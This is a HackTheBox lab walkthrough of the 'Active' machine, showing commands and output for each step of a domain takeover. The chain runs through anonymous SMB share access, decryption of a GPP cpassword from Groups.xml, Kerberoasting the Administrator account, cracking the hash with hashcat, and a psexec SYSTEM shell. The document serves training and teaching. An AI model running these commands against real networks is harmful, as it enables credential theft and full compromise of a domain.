Active — 0xnrg.se

HackTheBox · Lab

EasyWindowsActive DirectoryKerberos

IP: 10.10.10.100 | Domain: active.htb

Environment Setup

export IP=10.10.10.100
export VPN=$(ip a show tun0 | grep "inet " | awk '{print $2}' | cut -d/ -f1)
echo "10.10.10.100 active.htb" >> /etc/hosts

Step 1 — Port Scanning

Why: Map the attack surface. On a Windows box, seeing Kerberos (88), LDAP, and SMB together immediately confirms a Domain Controller. OS fingerprinting on older builds is important — legacy deployments are far more likely to have Group Policy misconfigurations.

nmap -sCV -p- --min-rate 5000 $IP -oN scans/nmap_active.out

Output:

PORT      STATE SERVICE
53/tcp    open  domain
88/tcp    open  kerberos-sec
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
389/tcp   open  ldap
445/tcp   open  microsoft-ds
464/tcp   open  kpasswd5
593/tcp   open  http-rpc-epmap
636/tcp   open  ldapssl
3268/tcp  open  globalcatLDAP
3269/tcp  open  globalcatLDAPssl
5722/tcp  open  msdfsr
9389/tcp  open  adws
47001/tcp open  winrm

Key findings:

Confirmed Domain Controller — Kerberos (88), LDAP (389/636/3268), DNS (53), kpasswd (464)
OS: Windows Server 2008 R2 Build 7601 — legacy, high chance of GPP credentials in SYSVOL
SMB (139/445) open — check for anonymous/null session share access
No HTTP — attack surface is purely AD/SMB

Step 2 — SMB Share Enumeration

Why: SMB shares on Domain Controllers often expose sensitive Group Policy files. Older AD environments frequently have null sessions or anonymous read access to shares that replicate SYSVOL — which can contain GPP credential files.

nxc smb $IP -u '' -p '' --shares

Output:

Share         Permissions     Remark
-----         -----------     ------
ADMIN$                        Remote Admin
C$                            Default share
IPC$                          Remote IPC
NETLOGON                      Logon server share
Replication   READ            ← anonymous read
SYSVOL                        Logon server share
Users

Key findings:

Replication share is readable anonymously — this is a mirror of SYSVOL
SYSVOL replication distributes Group Policy files to all DCs, including any GPP XML files
Users share not accessible — needs creds

Step 3 — GPP Password Discovery

Why: Group Policy Preferences (GPP) allowed admins to embed credentials in XML files deployed via SYSVOL. Microsoft accidentally published the AES-256 encryption key in their MSDN documentation (MS14-025 / CVE-2014-1812). Pre-existing Groups.xml files survive patching — if the file was ever written to SYSVOL, it stays there.

smbclient //$IP/Replication -N -c 'recurse ON; prompt OFF; mget *'
# Groups.xml found at:
# \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\Groups.xml

Output:

<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}">
  <User clsid="..." name="active.htb\SVC_TGS" ...>
    <Properties
      cpassword="<REDACTED>"
      userName="active.htb\SVC_TGS"
      acctDisabled="0" neverExpires="1" noChange="1"/>
  </User>
</Groups>

Key findings:

cpassword field found — AES-256 encrypted with Microsoft's published static key
Account: active.htb\SVC_TGS — service account, almost certainly Kerberoastable
Decryption requires no cracking — key is public

Step 4 — GPP Decrypt

Why: gpp-decrypt uses the Microsoft-published AES key to instantly reverse the cpassword value. No wordlist, no GPU — deterministic decryption.

gpp-decrypt "<REDACTED_CPASSWORD>"

Output:

<REDACTED>

Key findings:

Plaintext credential recovered: SVC_TGS:<REDACTED>
One-liner, zero effort — GPP is a gift that keeps giving on legacy environments
Next: check if SVC_TGS has a registered SPN → Kerberoast

Step 5 — Kerberoasting

Why: Any authenticated domain user can request a TGS for any SPN. The TGS is encrypted with the service account's NTLM hash — making it offline-crackable with hashcat. SVC_TGS is named after the Kerberos component it was likely associated with, so an SPN is expected. Administrator itself being Kerberoastable here is unusual but classic on legacy deployments.

impacket-GetUserSPNs active.htb/SVC_TGS:<REDACTED> -dc-ip $IP -request

Output:

ServicePrincipalName  Name           MemberOf  PasswordLastSet
--------------------  -------------  --------  ---------------
active/CIFS:445       Administrator             2018-07-18

$krb5tgs$23$*Administrator$ACTIVE.HTB$active/CIFS:445*$<REDACTED_HASH>

Key findings:

Administrator account is Kerberoastable — SPN: active/CIFS:445
Hash type: $krb5tgs$23$ (RC4-HMAC) — fast to crack, hashcat mode 13100
Built-in Administrator with an SPN is an instant game-over misconfiguration

Step 6 — Hash Cracking

Why: RC4-HMAC TGS-REP hashes (type 23) are among the fastest Kerberos hash types to crack. The password follows a common dictionary + year pattern — rockyou.txt hits it immediately.

hashcat -m 13100 administrator.hash /usr/share/wordlists/rockyou.txt

Output:

$krb5tgs$23$*Administrator$ACTIVE.HTB$active/CIFS:445*$<REDACTED_HASH>:<REDACTED>

Key findings:

Password cracked: Administrator:<REDACTED>
Rockyou hit — dictionary word + year combination, cracked in seconds

Step 7 — Domain Admin

Why: With the built-in Administrator's plaintext password we have full domain control. PSExec via SMB gives a SYSTEM shell directly on the DC.

impacket-psexec active.htb/Administrator:<REDACTED>@$IP

Output:

C:\Windows\system32> whoami
nt authority\system

hostname: DC

🏴 MACHINE PWNED — DOMAIN ADMIN ACHIEVED

Credentials

SVC_TGS:<REDACTED>
Administrator:<REDACTED>

Full Attack Chain

Anonymous SMB → Replication share (READ)
  └─ Groups.xml in SYSVOL → cpassword (GPP / MS14-025)
        └─ gpp-decrypt → SVC_TGS:<REDACTED>
              └─ Kerberoast → Administrator TGS (SPN: active/CIFS:445)
                    └─ hashcat (rockyou) → <REDACTED>
                          └─ PSExec → SYSTEM on DC
                                🏴 DOMAIN ADMIN